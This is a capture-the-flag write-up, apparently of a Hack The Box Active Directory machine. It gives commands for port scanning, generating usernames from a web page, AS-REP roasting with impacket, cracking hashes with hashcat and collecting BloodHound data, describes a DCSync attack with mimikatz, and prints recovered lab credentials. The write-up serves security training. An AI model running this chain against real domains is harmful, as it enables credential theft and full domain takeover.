Enumeration

1
export target=10.129.95.180

Port Scanning

1
2
3
rustscan -a $target --ulimit 10000 -g

10.129.95.180 -> [53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49674,49673,49676,49688,49696]
1
nmap -Pn -n -sC -sV -p53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49674,49673,49676,49688,49696 -T5 $target -oN nmap_sauna

Web Application (80)

We have potential usernames? We can try to find Kerberos Pre-Authentication disabled users

Create a wordlist

Using the /about.html page, create a names.txt file with the format ‘Firstname Lastname’

Then using names.txt, generate a wordlist using username-anarchy:

1
~/tools/username-anarchy/username-anarchy --input-file names.txt | tee  ~/HackTheBox/Labs/sauna/usernames_brute.txt

Then using impacket-GetNPUsers, brute force for AS-REP Roasting

1
impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -usersfile usernames_brute.txt -no-pass  -dc-ip $target -format hashcat -outputfile asrep-hashes.txt

Crack the hash

1
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt

We got the fsmith’s password: Thestrokes23

Initial Foothold

Privilege Escalation

Upload winPEAS

winPEAS found a AutoLogon credential

1
svc_loanmanager:Moneymakestheworldgoround!

Bloodhound

Let’s run Bloodhound

1
bloodhound-python -u 'fsmith' -p 'Thestrokes23' -ns 10.129.95.180 -d EGOTISTICAL-BANK.LOCAL -c all --zip

Appearently, the username is svc_loanmgr, add it to owned

svc_loanmgr has GetChangesAll right on the domain. I don’t know what is that (yet)

Bloodhound says we can perform DCSync attack

Upload mimikatz

Perform the DCSync attack:

Got the hash

Got the root flag

Key Takeaways

  • When you find employee names on a website, generate possible username formats with username-anarchy and test them for AS-REP Roasting.
  • Check WinPEAS output for AutoLogon credentials; passwords stored in plaintext in the registry enable lateral movement.
  • When you compromise an account with GetChangesAll rights in BloodHound, perform a DCSync attack to dump all domain hashes.